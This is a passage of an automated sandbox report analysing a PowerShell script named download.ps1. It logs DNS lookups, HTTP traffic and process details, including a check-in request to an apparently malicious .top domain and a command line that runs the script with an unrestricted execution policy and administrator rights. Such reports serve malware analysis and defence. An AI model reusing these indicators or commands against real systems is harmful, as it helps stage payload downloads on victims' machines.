                                                          Dec 28, 2024 15:34:11.181123972 CET8049746142.251.32.100192.168.11.20
                                                          Dec 28, 2024 15:34:11.181148052 CET8049746142.251.32.100192.168.11.20
                                                          Dec 28, 2024 15:34:11.181339979 CET4974680192.168.11.20142.251.32.100
                                                          Dec 28, 2024 15:34:11.182457924 CET4974680192.168.11.20142.251.32.100
                                                          Dec 28, 2024 15:34:11.279547930 CET8049746142.251.32.100192.168.11.20
                                                          Dec 28, 2024 15:34:11.284887075 CET8049746142.251.32.100192.168.11.20
                                                          Dec 28, 2024 15:34:11.284977913 CET8049746142.251.32.100192.168.11.20
                                                          Dec 28, 2024 15:34:11.284997940 CET8049746142.251.32.100192.168.11.20
                                                          Dec 28, 2024 15:34:11.285207987 CET4974680192.168.11.20142.251.32.100
                                                          Dec 28, 2024 15:34:11.395457983 CET4974580192.168.11.2045.61.136.138
                                                          Dec 28, 2024 15:34:11.395484924 CET4974680192.168.11.20142.251.32.100

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 28, 2024 15:34:10.069015026 CET5889853192.168.11.201.1.1.1
                                                          Dec 28, 2024 15:34:10.178416967 CET53588981.1.1.1192.168.11.20
                                                          Dec 28, 2024 15:34:10.546240091 CET6425153192.168.11.201.1.1.1
                                                          Dec 28, 2024 15:34:10.641041040 CET53642511.1.1.1192.168.11.20

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 28, 2024 15:34:10.069015026 CET192.168.11.201.1.1.10x8046Standard query (0)gajaechkfhfghal.topA (IP address)IN (0x0001)false
                                                          Dec 28, 2024 15:34:10.546240091 CET192.168.11.201.1.1.10x976aStandard query (0)www.google.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 28, 2024 15:34:10.178416967 CET1.1.1.1192.168.11.200x8046No error (0)gajaechkfhfghal.top45.61.136.138A (IP address)IN (0x0001)false
                                                          Dec 28, 2024 15:34:10.641041040 CET1.1.1.1192.168.11.200x976aNo error (0)www.google.com142.251.32.100A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • gajaechkfhfghal.top
                                                          • www.google.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.11.204974545.61.136.138805180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 28, 2024 15:34:10.350202084 CET215OUTGET /he0j3zgk4xhtr.php?id=computer&key=74358253620&s=527 HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                          Host: gajaechkfhfghal.top
                                                          Connection: Keep-Alive
                                                          Dec 28, 2024 15:34:10.544660091 CET166INHTTP/1.1 302 Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Sat, 28 Dec 2024 14:34:10 GMT
                                                          Content-Length: 0
                                                          Connection: keep-alive
                                                          Location: http://www.google.com


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.11.2049746142.251.32.100805180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 28, 2024 15:34:10.737001896 CET159OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                          Host: www.google.com
                                                          Connection: Keep-Alive
                                                          Dec 28, 2024 15:34:11.181123972 CET1289INHTTP/1.1 302 Found
                                                          Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaEMDcGOKYwLsGIjDmmjf5RfoXynhsHLU9-5UL4EauT7WlP0WR6aChLaO330w5Xq2eIOSGTJIBpqQdPEUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                          x-hallmonitor-challenge: CgsI45jAuwYQl8fkPBIEmhDA3A
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce--MHUwe97bz2bDYQaJge6ug' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                          Date: Sat, 28 Dec 2024 14:34:11 GMT
                                                          Server: gws
                                                          Content-Length: 396
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          Set-Cookie: AEC=AZ6Zc-W0PdHadkB960IbTWQI5S88XQzIcRWvqz1zsZ8K-RQyI02anxrDBg; expires=Thu, 26-Jun-2025 14:34:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                          Set-Cookie: NID=520=pt9TUKQKIKg5kixxFe3zUCPX_ogn65grsG74oi4JK3GN21AJ8vP302E-xBl1pJpHKGQ9JZcBWXx__5ZgseQniLqs0afOAIg9MpjuiT4XynQx4s1GhwcJIU89fZd8daxwNaYPcJzgBA3QgKOYde8nCb8jX-c3tr5cogiuTSh9Sxps4DqiKJhr5I3eCzIH8BL945ng; expires=Sun, 29-Jun-2025 14:34:10 GMT; path=/; domain=.google.com; HttpOnly
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c
                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html
                                                          Dec 28, 2024 15:34:11.181148052 CET334INData Raw: 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75
                                                          Data Ascii: ;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://www.google.com/&amp;q=EgSaEMDcGOKYwLsGIjDmmjf5RfoXynhsHLU9-5UL4EauT7WlP0WR6aChLaO330w5X
                                                          Dec 28, 2024 15:34:11.182457924 CET522OUTGET /sorry/index?continue=http://www.google.com/&q=EgSaEMDcGOKYwLsGIjDmmjf5RfoXynhsHLU9-5UL4EauT7WlP0WR6aChLaO330w5Xq2eIOSGTJIBpqQdPEUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                          Host: www.google.com
                                                          Cookie: NID=520=pt9TUKQKIKg5kixxFe3zUCPX_ogn65grsG74oi4JK3GN21AJ8vP302E-xBl1pJpHKGQ9JZcBWXx__5ZgseQniLqs0afOAIg9MpjuiT4XynQx4s1GhwcJIU89fZd8daxwNaYPcJzgBA3QgKOYde8nCb8jX-c3tr5cogiuTSh9Sxps4DqiKJhr5I3eCzIH8BL945ng
                                                          Dec 28, 2024 15:34:11.284887075 CET1289INHTTP/1.1 429 Too Many Requests
                                                          Date: Sat, 28 Dec 2024 14:34:11 GMT
                                                          Pragma: no-cache
                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Content-Type: text/html
                                                          Server: HTTP server (unknown)
                                                          Content-Length: 3075
                                                          X-XSS-Protection: 0
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://www.google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" dat
                                                          Dec 28, 2024 15:34:11.284977913 CET1289INData Raw: 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b
                                                          Data Ascii: a-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="tQ9CvzL5RMs_ZJ3W0YKTvq2HXFv7boLYmr-jbtg7aH3v2Uh_wAPnKB4dEVWhZv9WBsnf0qEzSwFbn2XKYTGSjA1ZSjNF6cJv1r13QA174Wrxopo1LRuUImovCjPSVZvBpQ78b_U0UGxT1mjBVg5mWid
                                                          Dec 28, 2024 15:34:11.284997940 CET777INData Raw: 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74
                                                          Data Ascii: ervice</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a s


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:09:34:05
                                                          Start date:28/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                          Imagebase:0x7ff697fd0000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:09:34:06
                                                          Start date:28/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff602410000
                                                          File size:875'008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Executed Functions

                                                            Function 00007FFCA0C68249 Relevance: .4, Instructions: 398COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14109446183.00007FFCA0C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0C50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0c50000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2fe496e7889375759376bd8abdb2b7dbec1d01e074cbf1f5bd89577a66c4ba12
                                                            • Instruction ID: 7cb503e70ccb7e392abad4de61aadf3b3de8642c97367cb8657830997071055b
                                                            • Opcode Fuzzy Hash: 2fe496e7889375759376bd8abdb2b7dbec1d01e074cbf1f5bd89577a66c4ba12
                                                            • Instruction Fuzzy Hash: E7D15030A18A4E8FEBA8DF28C8657E977D1FF54300F14466AE84DC7395DF34A9458B82
                                                            Function 00007FFCA0C68FF9 Relevance: .4, Instructions: 381COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14109446183.00007FFCA0C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0C50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0c50000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 028e0722f0d04495c00dbccdecb3dff05daf2b6fed36cdfbca4b8f5410ed49f1
                                                            • Instruction ID: ae57a8b69418339c90814082e907eb2b061a4d85d98fe82e00da1fa0c1c3e5a0
                                                            • Opcode Fuzzy Hash: 028e0722f0d04495c00dbccdecb3dff05daf2b6fed36cdfbca4b8f5410ed49f1
                                                            • Instruction Fuzzy Hash: 3DD15230A18A4E8FEBA8DF28C8557E977D1FF54351F14462AD80DC7395CE78A944C782
                                                            Function 00007FFCA0D2DF59 Relevance: .7, Instructions: 692COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14110024113.00007FFCA0D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0D20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0d20000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dbc69accc58f4d7aca6e3f3c6c432dbc0e2e02a6a012bf6d8e2b51d711585d13
                                                            • Instruction ID: 07c3f33191ed46be9698ce11b238de60ad54ed3002feb21b6039f7ca8a17c59a
                                                            • Opcode Fuzzy Hash: dbc69accc58f4d7aca6e3f3c6c432dbc0e2e02a6a012bf6d8e2b51d711585d13
                                                            • Instruction Fuzzy Hash: 56124632D4EB9E4FEB9ADB2848755743BE1EF5A250B1901FEC05DC7293D924AC06C3A1
                                                            Function 00007FFCA0C68C09 Relevance: .3, Instructions: 257COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14109446183.00007FFCA0C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0C50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0c50000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac88e3be05dac186963258194dd462986781d3b1690113116f3fa92329edd80a
                                                            • Instruction ID: 62a8e405efb58114ec260d42c663e1e41e02535454023e29ecd1e2376dcea07f
                                                            • Opcode Fuzzy Hash: ac88e3be05dac186963258194dd462986781d3b1690113116f3fa92329edd80a
                                                            • Instruction Fuzzy Hash: 1E915F30618A4E8FEBA8DF28C4557E977D1EF58350F14862AE84DC7395CB74A944CB82
                                                            Function 00007FFCA0C627A0 Relevance: .1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14109446183.00007FFCA0C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0C50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0c50000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2f64b08b42c109062aaaf0426e9c4d47326bde80b1b49aecefea55afb989f3a
                                                            • Instruction ID: fdfbeefdfe2ad667e5e1a4dd1749447b8c8b6e9c5c911c1f1514fb43d1f18e92
                                                            • Opcode Fuzzy Hash: e2f64b08b42c109062aaaf0426e9c4d47326bde80b1b49aecefea55afb989f3a
                                                            • Instruction Fuzzy Hash: 6E31D43191CB489FDB09DB5CA8066A97BF0EBA9320F00426FE449D3252DB64B855CBD7
                                                            Function 00007FFCA0C63038 Relevance: .1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14109446183.00007FFCA0C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0C50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0c50000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec4c156c5bbbc2fd8a777664faab39ce784532e3086f24354505a4ec517af53d
                                                            • Instruction ID: ae0c1daac1b71041ff6aac3ae922c41f5742ec1fb7d662c32c1b7a50628c3a24
                                                            • Opcode Fuzzy Hash: ec4c156c5bbbc2fd8a777664faab39ce784532e3086f24354505a4ec517af53d
                                                            • Instruction Fuzzy Hash: C9212C3190CA4C8FDB59DFACDC497E97BE0EF56321F00826BD048C3156D674A44ACB92
                                                            Function 00007FFCA0C62780 Relevance: .1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14109446183.00007FFCA0C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0C50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0c50000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a6d751373d63748267a690d97ec4130eac92ba66f57526a8730a87bd6d1d0d8
                                                            • Instruction ID: 47901853d85b456135271f6999d5e17fac2e1e58990a0e8c4e201b338e3460bc
                                                            • Opcode Fuzzy Hash: 2a6d751373d63748267a690d97ec4130eac92ba66f57526a8730a87bd6d1d0d8
                                                            • Instruction Fuzzy Hash: 8B31B43191CF4C8FDB589B5CA8566A8BBE0FB68311F10422FD449C3692CB74A855CBC7
                                                            Function 00007FFCA0C68694 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14109446183.00007FFCA0C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0C50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0c50000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b2949093c0b29b5a50d7abec2f0b7ef0bd9c2f65ac4c318db47e3e978f822f5
                                                            • Instruction ID: 2f6594c756f401129a83735f8273d01a5917249be417f9bba65092edd1e024b4
                                                            • Opcode Fuzzy Hash: 8b2949093c0b29b5a50d7abec2f0b7ef0bd9c2f65ac4c318db47e3e978f822f5
                                                            • Instruction Fuzzy Hash: FF31637095966E8EFBB49F14DC2ABF932D0FF41349F511638E40D86192CB387A49CB22
                                                            Function 00007FFCA0B3EF8A Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14108831495.00007FFCA0B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0B3D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0b3d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cfa68d394c28634c5047f9897d9f936a5347e8238c59174483750c8d6d3d9bc6
                                                            • Instruction ID: d4a135259a0de00e25831eaede7a1a301813978562d6e188c7d6e3423c8a0496
                                                            • Opcode Fuzzy Hash: cfa68d394c28634c5047f9897d9f936a5347e8238c59174483750c8d6d3d9bc6
                                                            • Instruction Fuzzy Hash: 6901F73154DE08CF9658EB2DF04585577D0FB44320710096FD01ACB6A5DA32F886CB92
                                                            Function 00007FFCA0C55395 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14109446183.00007FFCA0C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0C50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0c50000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c34a49101661f2c29a1e8144a236424d1e0c6747116a9b56fc5521902ddb0ff7
                                                            • Instruction ID: 7fdbe1917ca5c4035c379e76474b314e7bb77585e712b5bf65288f7562e31cb3
                                                            • Opcode Fuzzy Hash: c34a49101661f2c29a1e8144a236424d1e0c6747116a9b56fc5521902ddb0ff7
                                                            • Instruction Fuzzy Hash: 2201A73014CB0C4FD748EF0CE451AA9B7E0FB89324F10052DE58AC3266D632E882CB42
                                                            Function 00007FFCA0F01EA2 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14113022657.00007FFCA0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0F00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0f00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ffcabce807dc47d76a678aa41e8424e5090153cfade374d49c700e5942b1683f
                                                            • Instruction ID: f09ecbb780d2f7ee99cf6ee3c34f6a9880e8a8987117a8b276898d6d45097f95
                                                            • Opcode Fuzzy Hash: ffcabce807dc47d76a678aa41e8424e5090153cfade374d49c700e5942b1683f
                                                            • Instruction Fuzzy Hash: 7CF0BE32A0C5198FEB58EB1CE8568A873E1FF05320B5500B6E10CC76A7EA25BC06C750
                                                            Function 00007FFCA0B3EF9F Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14108831495.00007FFCA0B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0B3D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0b3d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 147a0ae148ef56daefef2c2b5036db59334cc6f5f07544137f7df4f94a2f3a2e
                                                            • Instruction ID: 6e175cbc12cfa114bb068fbb9c979df414c5fdc05153ee6cdb1695056cf309c4
                                                            • Opcode Fuzzy Hash: 147a0ae148ef56daefef2c2b5036db59334cc6f5f07544137f7df4f94a2f3a2e
                                                            • Instruction Fuzzy Hash: 7AF03A30519E09CF9BA4EF2DC495D1237E1FBA8310B210959E45EC7295D774F881CB91
                                                            Function 00007FFCA0C62E80 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14109446183.00007FFCA0C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0C50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0c50000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f2cff01c51d6e3397c940cbfd8f4ccd4a89e93e045a61d2fbad84b4a068ab0be
                                                            • Instruction ID: 19990e8e3edbef5c89dad440cb0e0a5540387aa08d5c9d88c1f8b924eb1b984d
                                                            • Opcode Fuzzy Hash: f2cff01c51d6e3397c940cbfd8f4ccd4a89e93e045a61d2fbad84b4a068ab0be
                                                            • Instruction Fuzzy Hash: B7F0E935808A8D8FDB069F749C155E57FA0EF26311F054297E45CC71B1DB34A458CBE2

                                                            Non-executed Functions

                                                            Function 00007FFCA0D29DE7 Relevance: 1.3, Instructions: 1272COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14110024113.00007FFCA0D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0D20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0d20000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be0f619a12c56efc70f5c61326fcf23c262af31e419c35dfa80eaf339969f4ba
                                                            • Instruction ID: 66cb68e17981dd363260b97233ee98e53bfbc9d65839e92be0e19ee1153783e3
                                                            • Opcode Fuzzy Hash: be0f619a12c56efc70f5c61326fcf23c262af31e419c35dfa80eaf339969f4ba
                                                            • Instruction Fuzzy Hash: EE824832D0DB9A4FEB9ADB2C88656747BE1EF5A250F0904FEC05DCB293C924AC46C751
                                                            Function 00007FFCA0C5849D Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.14109446183.00007FFCA0C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0C50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffca0c50000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M_^$M_^$M_^$^
                                                            • API String ID: 0-3009211057
                                                            • Opcode ID: 1d65e38a3745869b78c573d94cfe55c49b4a96ae0f65633c6d305fd58b40d76d
                                                            • Instruction ID: d2712356fe3ec8993e03f69e4d8c58d0b82c4d098e9f19e32990dedea9993d22
                                                            • Opcode Fuzzy Hash: 1d65e38a3745869b78c573d94cfe55c49b4a96ae0f65633c6d305fd58b40d76d
                                                            • Instruction Fuzzy Hash: 4A412256E4E6EB5FE3026B3D58790E93F509F62264B4A09F6D0C887193ED19380AC772